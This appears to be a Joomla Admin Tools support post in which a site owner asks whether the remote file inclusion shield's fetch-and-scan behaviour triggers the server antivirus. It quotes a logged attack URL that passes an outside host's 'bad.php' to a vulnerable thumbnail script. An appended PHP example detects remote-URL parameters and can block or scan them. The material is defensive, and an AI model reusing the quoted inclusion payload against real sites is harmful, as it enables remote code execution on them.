Have I read the related troubleshooter articles above before posting (which pages?)? Yes
Have I searched the tickets before posting? Yes
Have I read the documentation before posting (which pages?)? Yes
Joomla! version: 2.5.11
PHP version:
MySQL version: (unknown)
Host: (optional, but it helps us help you)
Admin Tools version: 2.4.4
Description of my issue:
We have been getting RFI attacks where the URLs looked like this:
http://www.ourwebsite.com/wp-content/themes/couponpress/thumbs/_tbs.php?src=http://picasa.com.civicimobiliare.ro/bad.php
Admin Tools has been catching these and logging them, but also the antivirus on the server has been catching these, which is making me a little nervous. When I looked at the description of the RFI functionality it says:
Remote File Inclusion block (RFIShield)
Some hackers will try to force a vulnerable extension into loading PHP code directly from their server. This is done by passing an http(s):// or ftp:// URL in their request, pointing to their malicious site. When this option is enabled, Admin Tools will look for such cases, try to fetch the remote URL and scan its contents. If it is found to contain PHP code, it will block the request.
My question is, when admin tools is fetching the remote URL to scan the contents, is that what the antivirus is picking up? Is it a false positive result? If we did not have antivirus running, would it have infected the site? Is there a way to just block requests like this instead of trying to fetch and scan the contents?
Thanks!
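As an added illustration (not code from the post, from Admin Tools or from Joomla), here are the two strategies the post contrasts, blocking on the URL pattern alone versus fetch-and-scan, written as a small PHP guard. All function names, the stand-in fetcher and the body it returns are assumptions constructed for the example; the only input taken from the post is the query string of the attack URL.

```php
<?php
// Added illustration (not Admin Tools / RFIShield source): a minimal remote
// file inclusion guard following the behaviour quoted in the post. All
// function names here are hypothetical.

/** True when a request value looks like a remote URL an RFI attempt would pass. */
function rfi_is_remote_url(string $value): bool
{
    // http://, https:// or ftp:// at the start of the value, case-insensitive.
    return (bool) preg_match('#^\s*(?:https?|ftp)://#i', $value);
}

/** True when a fetched body contains a PHP open tag (what a scan step looks for). */
function rfi_body_has_php(string $body): bool
{
    return (bool) preg_match('/<\?(?:php\b|=)/i', $body);
}

/** Return the request parameters whose values look like remote URLs. */
function rfi_suspicious_params(array $params): array
{
    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && rfi_is_remote_url($value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

/**
 * Decide whether to block a request.
 *
 * $mode 'block' : block as soon as any parameter carries a remote URL,
 *                 without ever contacting the remote host.
 * $mode 'scan'  : fetch each remote URL through $fetcher and block only if
 *                 the returned body contains PHP code (the RFIShield
 *                 behaviour quoted in the post). The body is held in memory
 *                 inside the web server process while it is inspected.
 */
function rfi_decide(array $params, string $mode, ?callable $fetcher = null): array
{
    $hits = rfi_suspicious_params($params);
    if (!$hits) {
        return ['block' => false, 'reason' => 'no remote URLs in request'];
    }
    if ($mode === 'block') {
        return ['block' => true,
                'reason' => 'remote URL in parameter(s): ' . implode(', ', array_keys($hits))];
    }
    foreach ($hits as $name => $url) {
        $body = $fetcher ? $fetcher($url) : '';
        if (rfi_body_has_php($body)) {
            return ['block' => true, 'reason' => "fetched $url contains PHP code (param $name)"];
        }
    }
    return ['block' => false, 'reason' => 'remote URLs fetched, no PHP code found'];
}

// Constructed sample: the query string of the attack URL from the post, parsed
// into request parameters, plus one benign request for comparison.
$attack = [];
parse_str('src=http://picasa.com.civicimobiliare.ro/bad.php', $attack);
$benign = ['src' => 'images/thumbs/photo.jpg'];

// Stand-in fetcher so the example runs offline; it never touches the network
// and returns a constructed body, not anything from the host in the post.
$fakeFetcher = function (string $url): string {
    return "<?php /* constructed sample body */ ?>";
};

print_r(rfi_decide($attack, 'block'));
print_r(rfi_decide($attack, 'scan', $fakeFetcher));
print_r(rfi_decide($benign, 'block'));
```

Run with `php rfi_guard.php`. In 'scan' mode the remote body passes through the PHP process, which is the point at which a server-side on-access scanner would see it; in 'block' mode the attacker's host is never contacted. Neither mode executes the fetched content, and the pattern match in `rfi_is_remote_url` can also be applied at the web server or WAF layer before the request reaches PHP at all.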